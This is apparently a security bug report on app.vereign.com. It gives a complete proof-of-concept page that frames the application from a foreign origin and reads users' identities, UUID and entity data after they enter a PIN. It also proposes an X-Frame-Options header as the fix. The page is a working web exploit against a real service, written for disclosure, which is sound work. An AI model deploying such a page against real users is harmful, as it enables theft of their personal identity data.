An attacker can create a site that embeds app.vereign.com in an iframe and obtain user data if the user enters the PIN code.

Example:

https://a1ex00x.com/fake.html

The fake.html code is:

<!DOCTYPE html>
<!-- Proof-of-concept page from the report: a third-party origin loads
     app.vereign.com's own client library and frames the app. The markup is
     kept as reported; the comments explain what each part does so the
     defensive fix can be assessed. -->
<html lang="en">
<head>
	<meta name="robots" content="noindex">
    <style>
        /* Frames are hidden by the stylesheet; the visible frame at the
           bottom of <body> overrides this with an inline style. */
        html, body {
            height: 100%;
        }
        body {
            margin: 0;
            padding: 0;
            overflow: hidden;
        }
        iframe {
        	display: none;
            width: 100%;
            height: 100%;
        }
    </style>
</head>
<body>
	<!-- The embeddable client library is fetched cross-origin from
	     app.vereign.com itself; nothing on this page shows it rejecting an
	     unexpected embedding origin.
	     NOTE(review): if /vcl/js/iframe is meant to be embeddable by partner
	     sites, a blanket X-Frame-Options: sameorigin would block those too —
	     confirm whether an explicit origin allowlist (CSP frame-ancestors)
	     is the intended control instead. -->
	<script src="https://app.vereign.com/vcl/js/client"></script>
    <script>
      // Initialise the library with the real application's endpoints. The
      // first argument matches the id of the <div> further down; presumably
      // the library mounts its own frame there — confirm against the library.
      window.setupViamAPI(
        "hackDiv",
        {
          onEvent: () => {}
        },
        "https://app.vereign.com/vcl/js/iframe",
        "https://app.vereign.com/api/",
        "https://app.vereign.com/wopi/",
        "https://app.vereign.com"
      ).then(async function(lib) {
        // Once the library resolves, identity data is read and written to the
        // console. The report states this only succeeds after the user has
        // entered the PIN code in the framed application.
        window.lib = lib;
        console.log("Injected: Lib is initialized");

        var identities = await lib.listIdentities();
        console.log("Injected: User identities: ", identities);

        var currentUUID = await lib.getCurrentlyLoggedInUUID();
        console.log("Injected: Current UUID: ", currentUUID.data);

        var entity = await lib.entityGetEntity(currentUUID.data);
        console.log("Injected: Current entity: ", entity);
        // Re-reads the entity every 5 s so later changes are captured too.
        setInterval(async function() {
			var entity = await lib.entityGetEntity(currentUUID.data);
        	console.log("Injected: Current entity: ", entity);
        }, 5000);
      });
    </script>
    <div id="hackDiv"></div>

	<!-- The inline style wins over the stylesheet's display:none, so this
	     frame is the visible part of the page. With X-Frame-Options:
	     sameorigin served by app.vereign.com the browser refuses to render
	     it inside a foreign origin. -->
	<iframe style="display: block;" src="https://app.vereign.com"></iframe>
</body>
</html>

Solution:

Add a special HTTP header to app.vereign.com so that it cannot be opened in an iframe: X-Frame-Options: sameorigin

Edited by Alexey Lunin